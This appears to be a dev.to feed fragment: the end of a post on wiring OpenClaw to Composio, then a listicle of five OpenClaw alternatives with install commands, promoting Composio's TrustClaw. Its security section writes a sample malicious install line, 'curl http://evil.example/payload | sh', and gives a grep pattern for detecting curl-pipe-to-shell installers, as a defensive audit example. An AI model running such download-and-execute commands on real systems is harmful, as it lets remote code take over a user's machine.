&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgllla2gksya8b9btu9pq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgllla2gksya8b9btu9pq.png" alt="OpenClaw chat session" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it asks you to connect the tools, head over to &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt; and connect each of the tools you require. It's as simple as clicking &lt;strong&gt;Connect&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkw7pva65r9ghx9vngi1g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkw7pva65r9ghx9vngi1g.png" alt="Composio Integrations" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the integrations you use are OAuth-hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap Up!
&lt;/h2&gt;

&lt;p&gt;OpenClaw is really useful for some people (not everyone), but it’s also risky. It can touch your files, run commands, and pull in third-party skills, which can &lt;strong&gt;include malware&lt;/strong&gt;, as we discussed. It’s a local agent gateway with access to everything: your filesystem, your shell, and whatever credentials you put into it. That power is the whole point, and it’s also the danger.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhnhhnc4jpxr7gwxosedq.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhnhhnc4jpxr7gwxosedq.gif" alt="With great power comes great responsibility GIF" width="480" height="256"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So if you’re going to use it, seriously consider &lt;strong&gt;OAuth-hosted safe integrations&lt;/strong&gt; instead of pasting API keys everywhere. It’s an easy way to reduce the chance of a disaster.&lt;/p&gt;

&lt;p&gt;And if you're looking for secure alternatives, you can find them here: &lt;a href="https://composio.dev/blog/openclaw-alternatives" rel="noopener noreferrer"&gt;Top 5 Secure OpenClaw Alternatives&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That’s it for this post. Hope it helped, and I’ll see you next time. ✌️&lt;/p&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>tutorial</category>
      <category>opensource</category>
    </item>
    <item>
      <title>🖐️Top 5 secure OpenClaw Alternatives you should consider 👀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Tue, 17 Feb 2026 12:59:41 +0000</pubDate>
      <link>https://dev.to/composiodev/top-5-secure-openclaw-alternatives-you-should-consider-172p</link>
      <guid>https://dev.to/composiodev/top-5-secure-openclaw-alternatives-you-should-consider-172p</guid>
      <description>&lt;p&gt;OpenClaw is everywhere right now, and I get the hype. I’ve been seeing it all over my feed lately, and it’s clearly clicking with a lot of people. 👌&lt;/p&gt;

&lt;p&gt;After using it for quite some time myself, though, I find it a bit too noisy, and not every tool works the same way for every person.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7j8wyae4kp66m1etga3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7j8wyae4kp66m1etga3.png" alt="OpenClaw tweets"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Whenever something starts trending this hard, it’s a good excuse to look around, especially if you’re after something more minimal.&lt;/p&gt;

&lt;p&gt;And now, OpenClaw may soon get its fourth rename, to &lt;strong&gt;Closed&lt;/strong&gt;Claw. 🤷‍♂️ You never know with OpenAI.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu5w8ex4icind6gwy2ph.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu5w8ex4icind6gwy2ph.png" alt="OpenClaw joining OpenAI tweet"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Why OpenClaw alternatives?
&lt;/h2&gt;

&lt;p&gt;OpenClaw is super powerful, no doubt, but it comes with two big headaches, and you've probably already felt them yourself.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Security&lt;/li&gt;
&lt;li&gt;Setup Friction&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When your agent can read files, run shell commands, and pull in third-party “skills,” you are basically giving it the keys to your machine. The skill marketplace has already turned into a real problem, with researchers finding &lt;strong&gt;hundreds of malicious skills&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;If you are not auditing everything you install, it is easy to get yourself cooked.&lt;/p&gt;
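&lt;p&gt;A manual audit doesn't have to be fancy. As a rough illustration (the folder, file, and URL below are all made up), you can grep a downloaded skill for classic curl-pipe-to-shell installers before running anything:&lt;/p&gt;

```shell
# Set up a fake "skill" folder containing a suspicious install script (illustration only)
mkdir -p /tmp/skill-demo
printf 'curl http://evil.example/payload | sh\n' > /tmp/skill-demo/install.sh

# Flag any file that pipes a download straight into a shell
grep -rEl 'curl[^|]*\|[[:space:]]*(ba)?sh' /tmp/skill-demo
# → /tmp/skill-demo/install.sh
```

This is only a first-pass filter; a clean grep result doesn't make a skill safe, it just catches the laziest attacks.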

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F170ua87mrfkafsw3pmx7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F170ua87mrfkafsw3pmx7.png" alt="OpenClaw marketplace found to have malwares"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup Friction&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The “self-host it and wire up” path is fun if you like tinkering, but it is also where most people get stuck. You end up handling gateways, background services, tokens, and permission issues (most of the time).&lt;/p&gt;

&lt;p&gt;And most people aren't going to use every feature that comes with the bloated app, just a few, so an alternative can often be a better fit.&lt;/p&gt;

&lt;p&gt;Below are five OpenClaw alternatives that can cover the same ground, often with a smoother and more minimal experience, depending on what you’re building.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://www.trustclaw.app/" rel="noopener noreferrer"&gt;TrustClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Rebuilt from scratch on OpenClaw's idea with &lt;strong&gt;1000+ tools&lt;/strong&gt;, with a focus on security.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygoq325t5h7exrxk46y4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygoq325t5h7exrxk46y4.png" alt="TrustClaw by Composio"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;TrustClaw is for those who like the idea of OpenClaw but don't want to hand their passwords over to the agent or run it locally.&lt;/p&gt;

&lt;p&gt;It's built by the &lt;strong&gt;Composio team&lt;/strong&gt;, and the pitch is basically: you get an agent that is available 24/7 and capable of taking real actions across 500+ apps, while the risky parts, like credentials and code execution, are handled in a more controlled way.&lt;/p&gt;

&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OAuth-only auth:&lt;/strong&gt; You connect apps the normal way (OAuth), so you are not pasting API keys or passwords into config files.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sandboxed execution by default:&lt;/strong&gt; Every action runs in an isolated cloud environment that disappears when the task finishes. So you are not running “agent code” locally with your permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed tool surface:&lt;/strong&gt; Instead of pulling random community “skills” from a public registry, TrustClaw uses Composio’s managed integrations and tooling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit trails + kill switch:&lt;/strong&gt; It keeps a full action log, and you can revoke access with one click if you ever need to.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The last point is important because agent toolchains are a real security risk right now. A single random add-on from these marketplaces can trick you into running malware, and it has already happened. Ref: &lt;a href="https://www.theverge.com/news/874011/openclaw-ai-skill-clawhub-extensions-security-nightmare" rel="noopener noreferrer"&gt;OpenClaw’s AI ‘skill’ extensions are a security nightmare&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The kind of prompts it’s built for
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;“Handle my customer complaints and log in Notion”&lt;/p&gt;

&lt;p&gt;It finds the right tools, fetches emails, creates drafts, and writes Notion pages (using tools such as: &lt;code&gt;GMAIL_FETCH_EMAILS&lt;/code&gt;, &lt;code&gt;GMAIL_CREATE_DRAFT&lt;/code&gt;, &lt;code&gt;NOTION_CREATE_PAGE&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;“Pull all Reddit threads mentioning [competitor] from the last 3 months, analyze sentiment...”&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;“Summarize all Slack messages in #product-feedback from this week...”&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why it’s comparatively better (for most of you)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Setup in seconds&lt;/strong&gt; (vs. 30 to 60 minutes of tunnels and local setup)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encrypted credentials&lt;/strong&gt; managed by Composio (vs. plaintext local config)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote sandbox&lt;/strong&gt; (vs. local machine execution)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed tool surface&lt;/strong&gt; (vs. unvetted public skill registry)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Action logs + one-click revocation&lt;/strong&gt; (vs. digging through config files)&lt;/li&gt;
&lt;li&gt;and no need for a &lt;strong&gt;Mac Mini&lt;/strong&gt; 🤷‍♂️&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Go to TrustClaw and hit &lt;a href="https://www.trustclaw.app/login" rel="noopener noreferrer"&gt;Get Started&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Connect the apps you want (OAuth flow).&lt;/li&gt;
&lt;li&gt;Give it a task in plain language, or schedule one to run while you are offline.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's a demo: 👇&lt;/p&gt;

&lt;p&gt;

&lt;iframe class="tweet-embed" id="tweet-2022518658048888916-653" src="https://platform.twitter.com/embed/Tweet.html?id=2022518658048888916"&gt;
&lt;/iframe&gt;






&lt;/p&gt;

&lt;p&gt;It's that simple. You now have an OpenClaw-style agent that runs completely in the cloud, with managed permissions and only the tools you require.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. &lt;a href="https://zeroclaw.org/" rel="noopener noreferrer"&gt;ZeroClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Written in Rust, it runs even on $10 hardware with &amp;lt;5MB RAM.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F576jdieqv0887vp0iv2r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F576jdieqv0887vp0iv2r.png" alt="ZeroClaw - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;ZeroClaw keeps the agent stack lean. Instead of a big local setup with lots of moving parts, you get a lightweight Rust binary that starts fast and runs comfortably on cheap hardware. If you care more about speed, stability, and low resource use, this one hits the sweet spot.&lt;/p&gt;

&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ultra lightweight:&lt;/strong&gt; designed to keep CPU and RAM usage low.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quick boot:&lt;/strong&gt; fast startup, good for bots and always-on tasks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular:&lt;/strong&gt; swap models, memory, tools, and channels without rewriting everything.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why pick it over OpenClaw?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You want something minimal and predictable.&lt;/li&gt;
&lt;li&gt;You’re running on a small VPS / Raspberry Pi / home lab.&lt;/li&gt;
&lt;li&gt;You don’t need a huge plugin marketplace, you need a tool that just runs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/zeroclaw-labs/zeroclaw.git
&lt;span class="nb"&gt;cd &lt;/span&gt;zeroclaw
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt;
cargo &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--path&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;--force&lt;/span&gt;

&lt;span class="c"&gt;# quick setup with openrouter&lt;/span&gt;
zeroclaw onboard &lt;span class="nt"&gt;--api-key&lt;/span&gt; sk-... &lt;span class="nt"&gt;--provider&lt;/span&gt; openrouter

&lt;span class="c"&gt;# chat&lt;/span&gt;
zeroclaw agent &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Hello, ZeroClaw!"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h2&gt;
  
  
  3. &lt;a href="https://github.com/qwibitai/nanoclaw" rel="noopener noreferrer"&gt;NanoClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ An OpenClaw alternative that runs entirely in a container for security.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ddtqk8ramy5wd0zd0si.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ddtqk8ramy5wd0zd0si.png" alt="NanoClaw - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;NanoClaw is basically the same thing, but it runs completely isolated inside a Docker container. The idea is simple: keep the codebase small, and put the risky stuff (bash, file access, tools) inside an isolated container so it can only touch what you explicitly mount.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Container isolation by default:&lt;/strong&gt; runs in Apple Container (macOS) or Docker (macOS/Linux), with filesystem isolation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Per-chat sandboxing:&lt;/strong&gt; each group/chat can have its own memory and its own mounted filesystem, separated from others.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Built on Anthropic’s Agents SDK:&lt;/strong&gt; it’s basically designed to work nicely with Claude’s agent tooling and Claude Code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WhatsApp + scheduled jobs:&lt;/strong&gt; message it from your phone, and set recurring tasks that ping you back.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/gavrielc/nanoclaw.git
&lt;span class="nb"&gt;cd &lt;/span&gt;nanoclaw
claude
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Then run &lt;code&gt;/setup&lt;/code&gt;. Claude Code handles everything: dependencies, authentication, container setup, and service configuration.&lt;/p&gt;

&lt;p&gt;Here's a quick demo: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/AQ5uiLyr8bQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;
&lt;h2&gt;
  
  
  4. &lt;a href="https://github.com/HKUDS/nanobot" rel="noopener noreferrer"&gt;nanobot&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Ultra lightweight AI assistant built with Python.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6pidyqqtzljh9u1j5fx3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6pidyqqtzljh9u1j5fx3.png" alt="nanobot - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nanobot, as the name suggests, is quite small. The core agent is about 4,000 lines of code, and the repo even publishes a live count you can verify with their script. That is the whole vibe: small enough that you can actually read it, trust it, and change it.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Core size metric:&lt;/strong&gt; ~4,000 LOC, with a “real-time” line count shown in the README (and a script to verify).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MCP support (fresh):&lt;/strong&gt; added 2026-02-14, so it can plug into MCP tool servers without you reinventing the plumbing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runs where you already are:&lt;/strong&gt; built-in “gateway” mode supports a bunch of chat surfaces like Telegram, Discord, WhatsApp, Slack, Email, and more.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;nanobot-ai

nanobot onboard
nanobot agent          &lt;span class="c"&gt;# local interactive chat&lt;/span&gt;
nanobot gateway        &lt;span class="c"&gt;# run it as a chat bot (Telegram, Discord, WhatsApp, etc)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Here's a quick architecture:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqmi9wen3bpya82ck9gyz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqmi9wen3bpya82ck9gyz.png" alt="nanobot architecture"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's a video to give you an idea of how it works: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/18WGbR6GYn0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;
&lt;h2&gt;
  
  
  5. &lt;a href="https://memu.bot/" rel="noopener noreferrer"&gt;memU Bot&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Built for 24/7 proactive agents designed for long-running use.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kh9ebx6inxnrato08td.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kh9ebx6inxnrato08td.png" alt="memU bot - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;memU Bot is built for people who want an agent that keeps running and becomes more useful over time, instead of resetting to zero every time you open a new chat.&lt;/p&gt;

&lt;p&gt;The site definitely looks like it was coded by a 12-year-old 😭, but don’t let that scare you off, because the product underneath is really good.&lt;/p&gt;

&lt;p&gt;Under the hood, it’s tied to &lt;strong&gt;memU&lt;/strong&gt;, NevaMind’s memory framework for long-running proactive agents, with a focus on reducing long-run context cost by caching insights.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Always-on + proactive:&lt;/strong&gt; it’s designed to sit in the background and capture intent (not just respond to prompts).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory system that scales:&lt;/strong&gt; memU treats memory like a file system (categories, memory items, cross-links), so the agent can fetch relevant fragments instead of shoving the whole history into every request.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;

&lt;p&gt;It's a bit more involved than other options.&lt;/p&gt;

&lt;p&gt;If you just want the product (memU Bot):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to &lt;a href="http://memu.bot/" rel="noopener noreferrer"&gt;memu.bot&lt;/a&gt;, enter your email, and get the download link they send you.&lt;/li&gt;
&lt;li&gt;Install it like a normal desktop app (they provide a macOS .dmg in the tutorial flow).&lt;/li&gt;
&lt;li&gt;Start it, connect the channel you want (Telegram, etc.), and let it run so it can build memory over time.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/NevaMind-AI/memU.git
&lt;span class="nb"&gt;cd &lt;/span&gt;memU

&lt;span class="c"&gt;# Requires Python 3.13+&lt;/span&gt;
pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;

&lt;span class="c"&gt;# set your key (OpenAI is the default in their quick tests)&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your_api_key"&lt;/span&gt;

&lt;span class="c"&gt;# quick test using in-memory storage&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
python test_inmemory.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Want persistent memory backed by Postgres + pgvector?&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; memu-postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_USER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_DB&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;memu &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt; 5432:5432 &lt;span class="se"&gt;\&lt;/span&gt;
  pgvector/pgvector:pg16

&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your_api_key"&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
python test_postgres.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;They also provide a small runnable "proactive loop" example if you want to see the behavior without going through tests:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;examples/proactive
python proactive.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;There's also a &lt;a href="https://github.com/NevaMind-AI/memU/blob/main/README.md#option-1-cloud-version" rel="noopener noreferrer"&gt;Cloud version&lt;/a&gt; which you can try out as well.&lt;/p&gt;

&lt;p&gt;It might be worth checking this out: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/M9ShNSaP8b8"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;



&lt;blockquote&gt;
&lt;p&gt;If you know of any other useful OpenClaw alternative tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That concludes this article. Thank you so much for reading! 🫡&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>ai</category>
      <category>productivity</category>
      <category>opensource</category>
      <category>security</category>
    </item>
    <item>
